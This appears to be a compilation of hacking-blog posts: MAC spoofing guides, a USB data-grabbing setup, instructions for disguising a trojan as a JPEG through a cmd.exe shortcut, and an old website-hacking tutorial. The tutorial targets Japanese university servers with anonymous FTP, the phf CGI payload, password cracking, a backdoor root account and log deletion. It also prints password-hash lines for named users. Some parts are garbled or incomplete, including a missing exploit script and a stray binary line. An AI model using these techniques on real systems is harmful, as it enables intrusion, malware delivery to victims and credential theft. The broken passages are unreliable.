MAC Address Changing Tricks / MAC Sppofing

Most people among us change their IP address and thinks they are anonymous on internet but one thing they forgot that they can be tracked down with MAC address which is still there non spoofed. So what to do then? Its practically impossible to change your MAC address but yes virtually its possible. Here is a application called SMAC that can help you to spoof your MAC address to maintain your anonymity on internet.


There are few tools Available to make use this ...


1. SMAC is a MAC Address Changer (Spoofer) for Windows 7, XP, Server 2003, and VISTA systems, regardless of whether the manufactures allow this option or not. 


There other wAys..

Change the MAC address in Windows

1. Go to Start -> Control Panel. Double click on Network Connections (inside Network and Internet Connections category in Windows XP). The, right click on the active network connection with network adapter that you want to change the MAC address (normally Local Area Network or Wireless Network Connection) and click on Properties.
   Above steps work in Windows XP, Windows 2000 and Windows Server 2003. For Windows Vista, access to NIC’s properties is from Control Panel -> Network and Internet -> Network and Sharing Center -> Manage Network Connections.
   Alternatively, if you already know which network adapter that’s responsible for your network or Internet connection, go to Device Manager and open the properties dialog by double click on the NIC itself.
2. In the General tab, click on the Configure button.
3. Click on Advanced tab.
4. In the Property section, select and highlight Network Address or Locally Administered Address.
5. To the right, “Not Present” radio button is by default selected as value. Change the value by clicking on radio button for Value:, and then type in a new MAC address to assign to the NIC.
   
   The MAC address consists of 6 pairs of numbers (0 – 9) and characters (A – F) combination. For example, 88-17-E8-90-E2-0A. When entering the new MAC value, omit the dash (-), for example 8817E890E20A.
6. Click OK when done.
7. To verify the change of MAC address, go to command prompt, then type in one of the following commands:
   ipconfig /all
   net config rdr
8. Reboot the computer if successful to make the change effective.

Note: To restore or reset back to original default MAC address, simply set back the option to “Not Present”.

Change the MAC Address of NIC in Windows via Registry

1. Open a command prompt.
2. Type the following command and hit Enter.
   ipconfig /all
3. Record down the Description and the Physical Address (is MAC address) of the active network connection (discard those with Media Disconnected state).
   
   For example, in figure above, Description is Intel(R) Wireless WiFi Link 4965AGN and MAC address is in the format of 00-XX-XX-XX-XX-XX.
4. In the command prompt also, type the following command and hit Enter.
   net config rdr
5. Record down the GUID for the MAC address for the active connection’s NIC which MAC address to be changed. The GUID is contained within the { and } brackets right in front of the MAC address as shown in figure below.
   
6. Type regedt32 or regedit in Start -> Run box or in Start Search for Windows Vista. Note: for Windows NT 4.0 and Windows 2000, regedt32 must be used.
7. Navigate to the following registry key:
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
8. Expand the {4D36E972-E325-11CE-BFC1-08002BE10318} tree, and there will be more sub-keys in the form of 0000, 0001, 0002 and so on.
9. Go through each sub-key starting from 0000, look for subkey that has DriverDesc value data that matches NIC description copied from step above, that want its MAC address to be changed. In most cases, it will be similar to the network adapter card name.
   To verify that the subkey found is indeed a correct one, check the value of the NetCfgInstanceId, which should have the same value with the NIC’s GUID taken from step above.
10. Once a sub-key is matched to the network interface card that MAC address want to be spoofed, select and highlight the subkey. Right click on the sub-key (for example, 0000), then select New ->String Value. Name the new value name as NetworkAddress.
    Note: If NetworkAddress REG_SZ registry key is already existed in the right pane, skip this step.
11. The double click on NetworkAddress and enter a new MAC address as its value data.
    
    Note that the 12-digit MAC address in hexadecimal format, and should be entered without any dash (-). For example, 1A2B3C4D5E6F.
12. Reboot the system to make the new MAC address effective. Alternatively, if you don’t want to restart the system, try to disable and then re-enable the network adapter in Device Manager.
13. To verify the change of MAC address, go to command prompt, then type in one of the following commands:
    ipconfig /all
    net config rdr

Note: To restore or reset back to true original hardware burned-in MAC address, remove the NetworkAddress registry key that is been added.

Alternative: Third party tools and utilities to change the MAC address in Windows operating system are plenty, for example: SMAC (direct download link to smac20_setup.ex, supports Windows Vista, XP, 2003, 2000), Macshift (direct download link to macshift.zip, for Windows XP), BMAC (almost identical SMAC MAC changer clone by moorer-software.com), Mac MakeUp (direct download link tomacmakeup.zip, for Windows 2000/XP/2003/Vista), MadMACs (MAC Address Spoofing And Host Name Randomizing App For Windows, directly download MadMACs.zip), EtherChange (direct download link to etherchange.exe), and Technitium MAC Address Changer (for Windows 2000 / XP / Server 2003 / Vista / Server 2008).

How to Change MAC Address (MAC Spoofing) in Linux and *nix

To change your MAC address in Linux and most Unix-like (*nix) system, run the following script commands:

ifconfig down

ifconfig hw

ifconfig up

For example, the command looks lik “ifconfig eth0 down hw ether 1A:2B:3C:4D:5E:6F”. First command brings down the network interface, second command change its MAC address while third command bring up the interface again. Note that in some cases, to bring down and bring up the network interface, the following commands have to be used:

/etc/init.d/networking stop or /etc/init.d/network stop (in the case of Fedora Core 5)

/etc/init.d/networking start or /etc/init.d/network stop (in the case of Fedora Core 5)

Alternatively, for Fedora Code 5 Linux with Iproute2 tools installed, the following commands also can change the MAC address to spoofed version:

/etc/init.d/network stop

ip link set address 1A:2B:3C:4D:5E:6F

/etc/init.d/network start

For example, “ip link set eth0 address 1A:2B:3C:4D:5E:6F”. To check whether the MAC address has been spoofed, use ip link ls eth0 or ip addr ls eth0 instead of using ifconfig eth0.

How to Make the Spoofed MAC Address Permanently Even After Reboot in Linux

Edit the ifcfg-eth0 file (or other similar file if you’re changing different interface), add the following variable line to the file:

MACADDR=12:34:56:78:90:ab

Then run service network restart to make the change effective immediately.

How to Make the Spoofed MAC Address Permanently on Restart in Debian

Edit the /etc/network/interfaces file and add in the following variable line to the appropriate section so that the MAC address is set when the network device is started.

hwaddress 02:01:02:03:04:08

For example, “hwaddress ether 02:01:02:03:04:08″.

Alternative: GNU Mac Changer (for Debian, Slackware, ArchLinux, Mandrake, Crux and other RPM-based distributions such as Fedora, Red Hat, CentOS, ASPLinux, SUSE Linux, OpenSUSE and etc.

How to Change MAC Address (MAC Spoofing) in BSD or FreeBSD

Issue the following commands in shell:

ifconfig down

ifconfig

ifconfig up

First command brings down the network interface (optional), second command change its MAC address while third command bring up the interface again (optional). For example, the command looks lik “ifconfig xl0 link 1A:2B:3C:4D:5E:6F” or “ifconfig fxp0 ether 1A:2B:3C:4D:5E:6F”

How to Change MAC address in Solaris

The shell command to change the MAC address in Sun Solaris is as below:

ifconfig

For example, the command looks like “ifconfig hme0 ether 1A:2B:3C:4D:5E:6F”. Note that the change is temporary that does not persist after a reboot. To make this change permanent, the command can be placed in a runtime control script (/sbin/sh).

How to Spoof MAC Address in HP-UX

It’s possible to change MAC address using HP-UX SAM. Select Networking and Communications, then selecting the interface, then click on Action -> Modify -> Advanced Options. Finally, change the value of station address, which is MAC address name in HP-UX.

How to Spoof and Change MAC Address in OpenBSD

Use the following command to change MAC Address to spoofed MAC in OpenBSD (after version 3.8):

ifconfig lladdr

For example, “ifconfig bge3 lladdr 1A:2B:3C:4D:5E:6F”.

How to Change to Spoofed MAC Address Permanently in OpenBSD

To make the MAC address changed at boot before network connection is established, and even before parsing of hostname.* file, edit the /etc/netstart file to add in the following lines before the line of “# Now parse the hostname.* file”:

if [ "$if" = "INTERFACE" ]; then
ifconfig lladdr
fi

# Now parse the hostname.* file
....

How to Change MAC Address in Mac OS X

Since Mac OS X 10.4.x (Darwin 8.x) onwards, the MAC address of wired Ethernet interface can be altered in Apple Mac OS X in a fashion similar to the Linux and FreeBSD methods. To do so, type the following command in Terminal.app:

sudo ifconfig en0 ether aa:bb:cc:dd:ee:ff

or

sudo ifconfig en0 lladdr aa:bb:cc:dd:ee:ff (for Mac OS X 10.5 Leopard)

where en0 is the network interface (numbered from en0, en1, en2 …) and aa:bb:cc:dd:ee:ff is the desired MAC address in hex notation.

Alternative: MacDaddy (download MacDaddyX.dmg, support Airport wireless adapter)

Make Your USB Device The Ultimate Hacking Tool

Now, the other day I was just Googling a few things, and I came across a few things that might interest you.




What if every time you inserted your thumb drive into a computer, it gave you all the sensitive data on the computer? That (and then some) is now possible. 




First, I reccomend partitioning your flash drive. Search Google for 
'bootit lexar', find it, and download it. Now insert your flash drive and then run BootIt.exe, which is inside the folder you downloaded. Before going any further, backup all your data on your flash drive. Now on your BootIt window, click Flip Removable Bit. Now take out your thumb drive and re-insert it.




Now, what you just did was reverse the bit rate of your thumb drive. Normally, Windows recognizes thumb drives as Removable Media because of thumb drives' bit rates. But when you flip the bit rate, you change it to the bit rate of a removable drive. Since Windows now recognizes your thumb drive as a removable drive, you can now partition it. 




Now, go to Start, then Run. Type diskmgmt.msc. Now find your drive in the top box and left click it. It should appear in the bottom box. Now right click it and select Delete Partition. Once it is finished, right click it again and Select New Partition. From the window that comes up, you can select how much space should be allocated in your first partition, you can give the partition a name, and also select which format the partition should be in. I reccomend the FAT32 format. 




You can repeat these steps to create new partitions. 




Now for the fun part. You can choose what you want to do with each partition. On the first one, I installed Ubuntu 8.04 Hardy Heron on one. On another, I put USB SwitchBlade and other programs on. And on another, I put a Ophcrack Live version on.




To install Ubuntu (or another distro) on your drive, you can always Google that. 




USB SwitchBlade is a tool created by Hak5. Once the files are copied to your drive, you can plug your drive into any computer. Once you run the program, it copies a LOT of sensitive data onto your flash drive. Each computer is separated in separate directories automatically. 




Other USB programs can be found at Nirsoft.net and if you do a little searching (or if you already know how), you can edit an autorun file for these. I put programs such as Angry IP Scanner. You can also search Google for 'USB Programs', or you can wait a bit until I can complie a link list.




Ophcrack can be installed easily. Just search Google. 
*Note that the USB SwitchBlade works best under Windows XP.


In my previous posts , you can find how install BT on USB Drive.... It will useful too

How to Hide File in a Image???

This is a good trick to hide your exe files into a jpg file.


How about sending a trojan or a keylogger into your victim using this trick..?

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

Cool First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you got to write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) Inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it. 

How to Face Autorun Virus with Windows 7

Most of the people will suffer with this virus.... so much annoying .... ppl afraid to use their pen  drive in local cyber cafe ,,,,, Just a Simple Solution ......


1. Open Run Task (Win button + R)

2. Type : gpedit.msc

3. Drill down to Computer Configuration –> Administrative Templates –> Windows Components –> Autoplay Policies –> Double click the Turn off Autoplay at the right side window.

4. There are 3 configurations available : Not Configured, Enabled, Disabled.

5. Choose Enabled then click apply .


That's it ..... this  Virus will stop  spreading from removable media such as CD, USB, Floppy, etc. 

Remote User Creation with Admin Rights

I came across about a small trick which will create the User id with admin privileges in the victims computer using HTML in windows.

The script provided in this article will create an "User ID" on the
victim's machine with "administrator" privileges. It is a local
system exploit which can be tweaked to exploit systems remotely. The
hacker can upload this script to any free Webserver and then can
trick it's victim to visit this link. Once the victim visits this
malicious link, an user named "warrior" with password "kickass" will
be created on the victim's system.

MalScript: Sample WSH Script to create "User" with "administrator
privileges"







u can aslo use it on any pc. just make a page using dis coding and
open it on dat pc

its really amazing,try it out and reply.

Value             : 10000111011001010100001100100001
Bitwise Complement:  10010001101000101011001111000

Web Hacking An Introduction

The Introduction on how to hack a website.

Source: Hackers Library

First of all you will need an ftp program such as ws_ftp. use Voyager FTP downloadable athttp://www.windows95.com/ it’s real simple and easy to use, so try it if you haven’t dealt with ftp before.  Now once you have the program find an address like http://www.shiga-pc.ac.jp you can find addresses like this by going to a search engine such as AltaVista or Google and running a search for url:ac.jp this tells the search engine to give you all the academic addresses in Japan  ex.  ac=academic jp=Japan , you can try this with any country ex.  url:dk .  But for now let’s just focus on the Japanese servers. When u have an address (I would recommend making a list of about 100 and trying them all) go to your ftp program and type in the address ex.  http://www.shiga-pc.ac.jp  note..  You will have to log in anonymously.   You should then get a list of folders on the remote system usr, pub,etc, dev, bin.  See the etc folder? open it, once opened you should see some files passwd and group, open or view the file passwd (this is where the passwords for the system are stored), you should hopefully get something
that looks like this:

root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:

uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
sso:Nologin:6:7:System Security Officer:/etc/security:
news:Nologin:8:8:USENET News System:/usr/spool/netnews:
sccs:PASSWORD HERE:9:10:Source Code Control:/:
ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh

rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh

rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
jgordon:w4735loqb8F5I:275:15:James.”Tiger” Gordon:/usr/email/users/jgordon:/bin/csh
lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh

erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh

dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh

This means you’ve hit the jackpot, in this case you should get a password cracker download one at (http://www.hackersweb.com go to the hacking toolz section), I would recommend for the beginning hacker to get a password cracker such as killer cracker because it’s extremely easy to use.  Once you have downloaded killer cracker you will need a dictionary file
(get one at http://www.hackersweb.com look in the extra toolz section), dictionary files are better the bigger they are so I would recommend (Basically this is a brute-forcing software)
getting one at around 10 MB or more.  Now the passwords from the passwd file off the server you are hacking, you will need to save them to a file and place them in the same directory as Killer Cracker, you will also need to have your dictionary file in the same directory.  Now you are ready to go, just run killer cracker and tell it the name of the Pwfile=the password
file and the name of the word file=your dictionary file, the valid file will be the file where the output of the password cracker will be put just give it a name such as crack.txt.  Once the cracker is done cracking the password files for you goto the valid file and take a look the file should look something like this

root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh

(remember this is an example). This file says that the username is root
and the password is rootif the file had been like this.
root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember again just an example) the login or username would be root and
the password would be dumbass, well that’s it just ftp to the site using
the login and password.  Note if you get root type in the following once
you have logged in:-   echo “myserver::0:0:Test User:/:/bin/csh”>>etc\passwd
this will allow you to login to the server with 1:myserver so you
get the admin suspicious when they see people login as root.  Hide yourself
as much as possible, if you already have a shell then go through that first
when loggin on, or telnet to the hacked site shell and then re-telnet to the
hacked shell using the hacked shell, if you see what I mean, so your who
appears as local host.  Also get some c scripts which delete your presence,
erases you off logs etc.

Now if you were not as lucky to get exactly the same password file as shown
in the example above then maybe you got something like this.

root:*:0:1:Operator:/:
ftp:*:53:53:anonymous ftp:/pub:
t2:*:201:201:Takaoka Tadashi:/pub:

This means that the passwd file is shadowed, if this is the case then
welcome to the administrators world of trying to stop hackers, this is
where you cant really do anything.  However there is one thing to do
sometimes in very rare cases there may be a folder on the remote system
that can be accessed by an anonymous login called shadowed, shadow, or
secret if this is the case the password files should be in there,
congratulations.   If there isn’t a folder like this, and the passwd file
is shadowed then bad luck, go to the next address on your list.

Now that you have tried the first thing as shown above there are a couple
of other methods you may also want to try one is FTP hacking shown below.

Go to a dos prompt after you are connected to the internet .

Type.

ftp www.victim=the site address
server will ask for a username press enter
server will ask for a password press enter
at the prompt type quote  user ftp
then type
quote cwd ~root
then type
quote pass ftp

If you get in make sure you delete the log file they might look at it and
see that you were on.  Once you get on the passwd file is in etc/passwd so
type cd etc then type get passwd.  If you have done the above right and the
server is old you will have root access.  By the way root is the highest
security status you can have.

Another good way of getting root or a shell at least is through browser
hacking.  Again well use Japanese educational servers as our target. To do
this you will need a browser such as Netscape or Internet Explorer, you
will also need a telnet program, you can either download a telnet program
at http://www.windows95.com or use the one that already comes with dos.
To access the telnet program that comes with dos go to your dos windows and
type in telnet www.site.com  the site.com stand for the site you want to
telnet to, it could be anything like www.geidai.ac.jp or www.tulips.tsukuba.ac.jp.  You will also need a cracker program I would recommend using Killer Cracker and applying as above.

Next thing you do is open your browser and run a search for url:ac.jp ,
like explained above.  Again I would recommend making a big list of your
targets.  Now when you have your targets we address type it in your browser
and add this to it.

http://www.tagetgoeshere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

or

http://www.tagetgoeshere.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd

To all you out there who are slightly advanced, I know this is the phf
technique and it is virtually dead, but you’ll be surprised where you can
use this.

This technique of finding the password file was first used in November 1996
on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
servers, so this won’t work on something like www.nasa.gov or most of the
www.*.com sites.  But still works on many university servers outside Europe
and the U.S.

O.K.  Once the url is entered you will see a number of things:-

Error 404

Cgi-bin/phf is not found on this server (the most common one)

Or

Warning

You do not have permission to view cgi-bin/phf?/ on this server

There are a number of other things the server might say, but the thing you
want it to say is this:-

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd

root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:fdn7:3:3:0000-Admin(0000):/:
adm:dehf6:4:4:0000-Admin(0000):/var/adm:
wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
smtp:cmvof:0:0:mail daemon user:/:
uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:eoend:37:4:Network Admin:/usr/net/nls:
nobody:ccvjcvj:60001:60001:uid no b

etc.

This means you have hit the jackpot!!!

If you get something similar to this but all lines have something in common
like the following:-

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd

root:x:0:1:0000-Admin(0000):/:/bin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
wnn:x:5:5:0000-Admin(0000):/var/adm:
news:x:6:6:0000-Admin(0000):/usr/lib/news:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no b

(notice the c) if you don’t know what this means it means the password
file is shadowed and you cannot work out ht epasswords for a shadowed
password file then you’re in bad luck, I would recommend trying the ftp
hack prior to this for the best results.

If some but not all logins have a * in them then it’s ok, it’s worth while
getting the ones which aren’t shadowed, hey a shell is a shell!!!

If you want to use your newly acquired shells then telnet to the site and
put in the login and the password (remember you have to crack the password
file first explained at the top).